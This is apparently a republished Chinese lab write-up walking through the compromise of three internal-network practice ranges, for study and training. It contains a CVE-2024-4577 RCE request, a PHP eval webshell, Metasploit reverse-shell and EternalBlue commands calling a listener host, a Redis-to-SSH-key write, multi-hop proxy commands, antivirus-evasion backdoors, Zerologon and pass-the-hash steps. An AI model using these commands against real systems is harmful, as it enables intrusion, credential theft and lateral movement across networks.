小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

admin 2025年4月7日23:57:38评论13 views字数 4002阅读13分20秒阅读模式

原文首发在:先知社区

https://xz.aliyun.com/news/17349

VPC1

入口机器192.168.133.185,尝试php8.2.12漏洞

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

利用CVE-2024-4577RCE

/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input
小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

RCE写入php木马

<?php
file_put_contents('/test.php', '<?php
eval($_POST["test"]);
');
?>

尝试访问test.php,没读到上传的马,找一下上传目录

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

找到test.php,上传目录在C:\xampp\php目录下

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

xampp默认web目录一般在htdocs下

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

上传test.php到htdocs并连接,再上传后门并连接

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

对被控主机网络探测,发现其他主机

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

192.168.2.4探测MS17-010(永恒之蓝)存在

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

用msf对MS17-010进行利用

新建foreign监听器,将权限分发给msf

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

msf指令

msfconsole  # 启动msf
use exploit/multi/handler   # 使用hanlder模块
set payload window/meterpreter/reverse_http   # 与cs中生成的一致
set lhost 192.168.133.160
set lport 1235

新建会话,选择msf监听器

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

此时cs上线的权限已经分发到msf

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

添加路由,让msf能访问目标主机访问目标内网其他主机

run autoroute -p  # 自动添加目标系统已知的所有网络路由
run post/multi/manage/autoroute

接下来使用msf中ms17_010模块

use exploit/windows/smb/ms17_010_eternalblue  # 使用该模块
set payload windows/x64/meterpreter/reverse_tcp   # 在当前模块设置一个payload,端口为该模块提供端口
set rhost 192.168.2.4   # 设置目标主机
set lhost 192.168.2.5   # 设置监听主机
set lport 1236
use exploit/multi/handler #回到exploit/multi/handler 模块,设置监听器以接受目标主机反向连接
set lhost 192.168.2.5  # 设置监听主机
set lport 1236      
use exploit/windows/smb/ms17_010_eternalblue  # 回到exploit/windows/smb/ms17_010_eternalblue模块
run

成功上线192.168.2.4

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

在cs上生成一个后门,用kali上传到192.168.2.4并运行,cs上线

upload homekaliDesktoptest2.exe C:test2.exe

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

mimikatz抓取192.168.2.4明文密码失败

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

进程注入,选择一个administrator权限的进程进行注入,降权至administrator抓取明文密码

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

利用明文密码横向移动,192.168.2.4有防火墙,所以正向上线192.168.2.6

成功上线192.168.2.6

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

192.168.4.*扫描到7001端口,通常有weblogic服务

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

配置代理访问192.168.4.128

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

检查weblogic漏洞存在

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

上传内存马&cs后门上线192.168.4.128

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

mimikatz抓取192.168.10.128密码,对192.168.10.12进行横向小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

成功上线192.168.10.12

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

域控提权CVE-2020-1472连接dc清空凭证

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

sectetsdump.py拿到域控hash

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

psexec横向移动

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

成功上线dc,至此靶场结束

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

VPC2

nmap扫描入口机器192.168.133.189

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

访问8080端口发现tomcat服务,弱口令登录后台,部署war包getshell

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

上线cs信息收集

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

net user /domain&ping dc确认域控ip

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

扫描数据库常见端口,尝试连接数据库进行数据库提权

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

C:WebCodedanganWeb.config文件中找到数据库密码

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

配置代理,用mudt连接mssql,开xp_cmdshell成功命令执行

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

上传后门&上线cs

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

mimikatz抓取密码,尝试横向

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

借助impacket套件通过ipc$横向移动

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

将后门放在192.168.2.10web目录下,用certutil远程下载后门,失败了

登录靶机可以看到火绒拦截了certutil.exe

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

分离免杀后门成功上线,且火绒查杀不报毒

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

利用域控用户上线192.168.2.12

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

接下来继续探测域控内网,发现192.168.3.*网段

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

扫描到web服务

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

web页面是通达OA,直接工具一把梭

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

蚁剑成功连接

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

192.168.3.10有防火墙,所以正向上线

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

确定域控ip

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

域控提权CVE-2020-1472拿到hash

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

hash传递上线192.168.3.20

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

探测192.168.4.*内网

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

crackmapexec密码喷洒192.168.4.*

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

hash传递上线192.168.4.11

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

上传Adfind,探测发现存在约束委派(机器用户)

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

主机用户

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

约束委派攻击上传后门至192.168.4.20并执行

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

最后hash传递192.168.4.12,靶场完成

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

VPC3

fscan扫描入口机192.168.133.198存在redis未授权

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

写入公钥getshell

sshkeygen   # 生成密钥对
图形化界面将公钥保存至1.txt中(换行保存)
cat /home/kali/Desktop/1.txt | redis-cli -h 192.168.133.198 -x set test   # 将本地公钥写入redis数据库
redis-cli -h 192.168.133.198
config set slave-read-only no   # 设置文件写入权限
config set dir /root/.ssh   # 设置redis备份路径
config set dbfilename authrized_keys  # 设置保存文件名为 authorized_keys
save  # 将redis数据保存至磁盘
ssh -i id_ed25519 [email protected]  # 通过私钥连接目标机器ssh

整个过程就是将1.txt(公钥)从redis保存到了/root/.ssh下authorized_keys 文件中
小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

msf生成一个后门,并在生成路径启动一个http服务,用被控目标主动下载后门

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

运行后门,上线至msf

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

msf获取目标全部路由

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

cat ~/.bash_history发现被控机器有ssh连接行为

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

被控目标切换到/root/.ssh目录下,成功连接192.168.52.20

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

生成后门上传至192.168.52.10

192.168.52.10上启动http服务,让192.168.52.20下载后门

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

成功上线192.168.52.20

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

配置socks5代理

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

扫描192.168.4.*

./fscan -h 192.168.4.0/24 -p 1-65535 -np -nobr

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

访问web页面

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

用stowaway工具建立多层代理

第一层 192.168.133.160->192.168.133.198
admin:# kali
./linux_x64_admin -l 8888 -s 123
agent 0: # 被控机ubuntu1
./linux_x64_agent -c 192.168.133.160:8888 -s 123

第二层 192.168.52.10->192.168.52.20
agent 1: # 被控机ubuntu2
./linux_x64_agent -c 8889 -s 123
use 0# 切换到节点0,即ubuntu1
connect 192.168.52.20:8889
socks 7788

dirsearch扫描发现疑似源码泄露

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

拿到数据库密码,尝试数据库提权

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

mdut连接

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

目标有防火墙,采用反向后门上线至msf

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

确定域控ip,setspn -T ROOTKIT.org -q */*命令发现存在exchange服务

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

mimikatz抓取明文密码

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

stowaway再加一层代理,以通讯192.168.3.*

use 1 -> listen -> 1 -> 9000 # 切换到节点1,监听节点1的9000端口
agent2:
windows_x64_agent.exe -c 192.168.4.141:9000 -s 123 # 连接节点1
小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

扫描192.168.3.*共发现3台机器

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

CVE-2020-06883.144进行exchange攻击

cve-2020-0688执行成功,用ysoserial.exe生成payload填入即可执行命令

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

上传后门至192.168.4.140,让目标远程下载,成功上线

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

上传mimikatz抓取到域控明文密码,可用域控明文密码横向移动

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

wmic可以直接横向

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

windows defender对横向移动手法拦截少,可以横向成功

cmd识别杀软:
wmic /namespace:\rootSecurityCenter2 path AntiVirusProduct get displayName,productState
powershell识别杀软:
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct
小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

msf生成ps1后门

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

将后门上传至web服务目录,让目标机器下载,ps1不能直接下载,存为exe

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

远程下载免杀后门

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

成功上线,靶场完成

小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

原文始发于微信公众号(亿人安全):小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月7日23:57:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   小迪安全2024内网靶场-VPC1 & VPC2 & VPC3https://cn-sec.com/archives/3923973.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息